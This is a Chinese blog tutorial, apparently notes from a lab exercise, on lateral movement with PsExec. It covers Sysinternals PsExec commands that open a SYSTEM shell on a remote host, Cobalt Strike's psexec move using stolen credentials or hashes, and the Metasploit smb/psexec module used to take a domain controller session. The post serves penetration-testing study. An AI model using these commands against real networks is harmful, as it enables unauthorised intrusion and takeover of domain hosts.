当前位置:首页 » 《随便一记》 » 正文

【渗透测试笔记】之【内网渗透——横向移动:PsExec的使用】_AA8j的博客

23 人参与  2022年06月04日 15:07  分类 : 《随便一记》  评论

点击全文阅读


文章目录

  • 1. PsTools工具包中的PsExec
    • 1.1 注意事项
    • 1.2 使用方法
      • 1.2.1 获得交互式shell
      • 1.2.2 执行单条命令并回显
  • 2. CS中的PsExec
    • 2.1 查看目标所在网段其它主机
    • 2.2 使用PsExec横向移动
  • 3. msf中的PsExec
    • 3.1 添加路由
    • 3.2 加载模块,设置目标IP、账号、密码及设置payload

1. PsTools工具包中的PsExec

地址:https://download.sysinternals.com/files/PSTools.zip

1.1 注意事项

  1. 需要开启默认共享
  2. 建立了IPC$不需要账号密码参数
  3. 执行过程中目标系统会创建psexec服务,命令执行后会删除。但是会产生日志文件。

1.2 使用方法

1.2.1 获得交互式shell

.\PsExec.exe -accepteula \\10.1.1.2 -s cmd.exe
# 已建立IPC$的情况
# -accepteula:第一次运行不弹出确认框
# -s:system权限运行

.\PsExec.exe -accepteula \\10.1.1.2 -u administrator -p 123.com -s cmd.exe
# 未建立IPC$的情况

在这里插入图片描述

1.2.2 执行单条命令并回显

.\PsExec.exe -accepteula \\10.1.1.2 -s cmd.exe /c "whoami"
# 同理,已经建立IPC$

在这里插入图片描述

2. CS中的PsExec

2.1 查看目标所在网段其它主机

  1. 扫描主机
    在这里插入图片描述
    在这里插入图片描述

  2. 列出主机
    在这里插入图片描述
    在这里插入图片描述

2.2 使用PsExec横向移动

  1. 右键要横向的目标主机,选择psexec的版本(32位64位或PowerShell)。
    在这里插入图片描述
  2. 选择已经获得的凭据(明文、散列值、令牌都可以)、回连的listener、进行横向的session。
    在这里插入图片描述
  3. 点击Launch,即会返回一个DC-1的session。 在这里插入图片描述
    在这里插入图片描述

3. msf中的PsExec

3.1 添加路由

在这里插入图片描述

3.2 加载模块,设置目标IP、账号、密码及设置payload

use exploit/windows/smb/psexec
set rhosts 10.1.1.2
set smbuser administrator
set smbpass 1234567.com

这里就使用默认payload。
run。
在这里插入图片描述
成功获得DC-1的session:
在这里插入图片描述


点击全文阅读


本文链接:http://m.zhangshiyu.com/post/41372.html

目标  横向  主机  
<< 上一篇 下一篇 >>

  • 评论(0)
  • 赞助本站

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

关于我们 | 我要投稿 | 免责申明

Copyright © 2020-2022 ZhangShiYu.com Rights Reserved.豫ICP备2022013469号-1